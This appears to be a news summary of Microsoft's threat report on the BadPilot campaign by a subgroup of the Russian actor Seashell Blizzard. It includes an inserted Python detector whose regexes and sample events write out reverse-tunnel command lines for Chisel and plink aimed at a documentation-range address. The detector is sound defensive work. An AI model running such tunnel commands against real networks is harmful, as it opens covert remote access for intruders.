Microsoft has published its research on a subgroup of the Russian state actor known as Seashell Blizzard, specifically focusing on the “BadPilot campaign.” The campaign has been active since at least 2021, employing a range of tactics to infiltrate and exploit Internet-facing infrastructure, thereby enabling the broader Seashell Blizzard operations to maintain a foothold in high-value targets across various sectors worldwide.
The subgroup’s operations have expanded significantly, moving beyond Eastern Europe to encompass a near-global targeting strategy. This shift reflects a strategic evolution, allowing Seashell Blizzard to engage in niche operations that align with Russia’s geopolitical objectives. The campaign has demonstrated a capacity for opportunistic access, utilizing stealthy techniques to collect credentials and facilitate lateral movement within compromised networks.
Notably, the subgroup has successfully penetrated sensitive sectors, including energy, telecommunications, and arms manufacturing, as well as government entities. Recent activities have indicated a particular focus on vulnerabilities in widely used software, such as ConnectWise ScreenConnect and Fortinet FortiClient EMS, which have allowed access to targets in the United States and the United Kingdom since early 2024.
Microsoft Threat Intelligence has observed that while some of the subgroup’s targeting appears opportunistic, the cumulative effect of these compromises provides Seashell Blizzard with a range of options to respond to evolving strategic goals. Since the onset of the conflict in Ukraine, there has been an uptick in targeting international organizations that are geopolitically significant or provide support to Ukraine, with at least three destructive cyberattacks attributed to this subgroup since 2023.
The operational patterns of Seashell Blizzard’s subgroup reveal a sophisticated approach to cyber intrusions, characterized by notable shifts in post-compromise tradecraft. This evolution poses a significant risk to organizations within the group’s strategic purview, necessitating heightened vigilance and robust incident response measures.
Who is Seashell Blizzard?
Seashell Blizzard is a high-impact threat actor associated with the Russian Federation, operating under the auspices of Russian Military Intelligence Unit 74455 (GRU). Their activities span a range of operations, from espionage to cyber-enabled disruptions, often manifesting as destructive attacks on critical infrastructure. Since its emergence in 2013, Seashell Blizzard has been linked to several high-profile incidents, including the notorious NotPetya attack.
The group’s operations are marked by a focus on critical infrastructure, particularly during military conflicts. Their persistent targeting of Ukraine since the onset of the invasion in 2022 underscores their role in supporting Russian military objectives. The subgroup’s ability to leverage diverse tradecraft and publicly available tools highlights its adaptability and sophistication in executing cyber operations.
Attribution assessment
Microsoft Threat Intelligence has established a clear link between the initial access subgroup and Seashell Blizzard, based on distinct patterns of exploitation and post-compromise activities. The subgroup’s consistent use of specific exploits and tooling allows for differentiation from other threat actors, reinforcing the assessment of its operational capabilities.
Scope of operations and targeting trends
The subgroup’s operations have evolved to encompass a wide array of sectors and geographical areas. Initially focused on Ukraine, the group’s activities have broadened to include significant targets in the United States, Canada, and the United Kingdom. This expansion reflects a strategic pivot, allowing Seashell Blizzard to capitalize on vulnerabilities across various regions and sectors.
The subgroup’s historical exploitation patterns suggest a methodical approach to achieving compromises at scale, often employing a “spray and pray” strategy to maximize the likelihood of accessing strategically valuable targets. This opportunistic approach is complemented by significant post-compromise activities when high-priority targets are identified.
Initial access subgroup opportunistically compromises perimeter infrastructure using published CVEs
Since late 2021, the subgroup has employed targeted operations to exploit vulnerable Internet-facing infrastructure, utilizing a consistent set of tactics, techniques, and procedures (TTPs) to establish persistence and lateral movement. Microsoft Threat Intelligence has identified at least three distinct exploitation patterns linked to this subgroup, highlighting its evolving operational lifecycle.
Exploitation patterns
The initial access subgroup has demonstrated three primary exploitation patterns:
Deployment of remote management and monitoring (RMM) suites for persistence and command and control (February 24, 2024 – present)
In early 2024, the subgroup began utilizing RMM suites to achieve persistence and command and control, marking a novel approach for Seashell Blizzard. This technique involved exploiting vulnerabilities in widely used software to deploy RMM agents, allowing the threat actor to retain persistent remote control of compromised hosts while reducing the risk of detection.
Use of tunneling utilities such as Chisel, plink, and rsockstun to establish dedicated conduits into affected network segments
Through the deployment of tunneling utilities like Chisel and rsockstun, the subgroup has established reverse tunnels to actor-controlled infrastructure, facilitating covert access to compromised networks.
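As an added defender-side example (not code from the Microsoft report), the following script classifies process-creation events for the tunneling utilities named above and for reverse-tunnel command lines, which is the kind of check the later indicators-of-compromise guidance calls for. The event format, the constructed sample events, and the command-line patterns (chisel's `R:` remote-forward argument and plink's `-R` remote port forwarding) are assumptions, not details taken from the report.

```python
import re
from typing import Dict, List, Tuple

# Executable basenames of the tunneling utilities the report links to this subgroup.
TUNNEL_BINARIES = {"chisel", "plink", "rsockstun"}

# Assumed command-line signatures of a reverse tunnel (not taken from the report):
# chisel's "R:" remote-forward argument and plink's "-R" remote port forwarding.
REVERSE_TUNNEL_PATTERNS = [
    re.compile(r"\bchisel(\.exe)?\s+client\b.*\bR:", re.IGNORECASE),
    re.compile(r"\bplink(\.exe)?\b.*\s-R\b", re.IGNORECASE),
]


def _basename(image_path: str) -> str:
    """Normalise a Windows or POSIX path to a lowercase basename without .exe."""
    name = image_path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify_process_event(event: Dict[str, str]) -> str:
    """Return 'reverse_tunnel', 'tunnel_binary' or 'benign' for one process-creation event."""
    if any(p.search(event.get("command_line", "")) for p in REVERSE_TUNNEL_PATTERNS):
        return "reverse_tunnel"
    if _basename(event.get("image", "")) in TUNNEL_BINARIES:
        return "tunnel_binary"
    return "benign"


def find_tunneling_activity(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (host, verdict, image) for every event that is not benign."""
    hits = []
    for event in events:
        verdict = classify_process_event(event)
        if verdict != "benign":
            hits.append((event["host"], verdict, event["image"]))
    return hits


# Constructed sample events (not real telemetry); 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"host": "srv-01", "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
    {"host": "srv-01", "image": r"C:\Windows\Temp\chisel.exe",
     "command_line": "chisel.exe client 203.0.113.10:8080 R:socks"},
    {"host": "srv-02", "image": r"C:\Users\Public\plink.exe",
     "command_line": "plink.exe -N -R 0.0.0.0:4444:127.0.0.1:3389 u@203.0.113.10"},
    {"host": "srv-03", "image": "/tmp/rsockstun", "command_line": "/tmp/rsockstun"},
]

if __name__ == "__main__":
    for hit in find_tunneling_activity(SAMPLE_EVENTS):
        print(hit)
```

Matching on basename alone will miss renamed binaries, so in practice pair this with file-hash or import-based detection; the command-line patterns catch the reverse-tunnel usage regardless of the file name.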
Modification of infrastructure to expand network influence through credential collection (late 2021 – 2024)
In targeted operations, the subgroup has modified network resources to passively gather credentials, thereby expanding its access to sensitive information and target networks.
Indicators of compromise
Organizations should remain vigilant for specific indicators of compromise associated with Seashell Blizzard’s activities, including suspicious email addresses and the presence of tunneling utilities on affected systems.
References
For further insights and detailed reports on the threat landscape, organizations are encouraged to consult the Microsoft Threat Intelligence Blog and leverage Microsoft Defender tools to enhance their security posture.